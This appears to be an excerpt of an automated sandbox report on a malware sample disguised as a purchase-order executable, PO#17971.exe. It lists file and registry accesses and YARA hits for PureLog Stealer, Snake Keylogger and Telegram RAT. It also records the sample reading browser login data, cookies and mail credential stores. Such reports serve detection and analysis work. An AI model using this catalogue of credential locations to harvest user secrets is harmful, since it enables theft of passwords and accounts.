Source: C:\Users\user\Desktop\PO#17971.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Queries volume information: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 9_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

9_2_00412A15

Source: C:\Users\user\Desktop\PO#17971.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.PO#17971.exe.70a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO#17971.exe.2d9d95c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TZRtlifudvO.exe.254da24.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO#17971.exe.70a0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TZRtlifudvO.exe.254da24.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO#17971.exe.2d9d95c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2093507552.00000000070A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2130210299.00000000024D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2086741217.0000000002D74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.4513884239.00000000071C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4514479372.0000000006A31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 16.2.vbc.exe.8d70000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6e9fe5e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6e9fe5e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810f20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6ea0d7e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6ea0d7e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.8d70000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 7192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 7584, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 16.2.vbc.exe.8d70000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6e9fe5e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6e9fe5e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810f20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6ea0d7e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6ea0d7e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.8d70000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 7192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 7584, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 16.2.vbc.exe.8d70000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6e9fe5e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6e9fe5e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810f20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6ea0d7e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6ea0d7e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.8d70000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
